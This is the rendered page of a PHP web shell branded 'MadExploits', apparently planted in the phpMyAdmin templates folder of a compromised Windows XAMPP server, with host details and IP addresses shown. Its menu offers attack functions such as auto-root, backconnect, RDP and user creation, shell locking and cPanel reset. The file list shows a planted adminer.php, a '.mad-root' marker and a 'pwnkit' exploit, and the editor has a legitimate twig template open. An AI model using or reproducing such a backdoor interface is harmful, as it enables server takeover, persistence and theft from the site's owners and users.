Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.101
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
templates /
database /
structure /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
add_prefix.twig
425
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
body_for_table_summary.twig
3.37
KB
-rw-rw-rw-
bulk_action_modal.twig
802
B
-rw-rw-rw-
change_prefix_form.twig
488
B
-rw-rw-rw-
check_all_tables.twig
3.75
KB
-rw-rw-rw-
collation_definition.twig
48
B
-rw-rw-rw-
copy_form.twig
1.78
KB
-rw-rw-rw-
drop_form.twig
941
B
-rw-rw-rw-
empty_form.twig
962
B
-rw-rw-rw-
favorite_anchor.twig
383
B
-rw-rw-rw-
index.twig
873
B
-rw-rw-rw-
overhead.twig
182
B
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
show_create.twig
1.28
KB
-rw-rw-rw-
structure_table_row.twig
8.35
KB
-rw-rw-rw-
table_header.twig
3.47
KB
-rw-rw-rw-
tracking_icon.twig
261
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.twig
{% for flash_key, flash_messages in flash() %} {% for flash_message in flash_messages %} <div class="alert alert-{{ flash_key }}" role="alert"> {{ flash_message }} </div> {% endfor %} {% endfor %} {% if has_tables %} <div id="tableslistcontainer"> {{ list_navigator_html|raw }} {{ table_list_html|raw }} {{ list_navigator_html|raw }} </div> <hr> <p class="d-print-none"> <button type="button" class="btn btn-link p-0 jsPrintButton">{{ get_icon('b_print', 'Print'|trans, true) }}</button> <a href="{{ url('/database/data-dictionary', {'db': database, 'goto': url('/database/structure')}) }}"> {{ get_icon('b_tblanalyse', 'Data dictionary'|trans, true) }} </a> </p> {% else %} {{ 'No tables found in database.'|trans|notice }} {% endif %} {% if not is_system_schema %} {{ create_table_html|raw }} {% endif %}
Close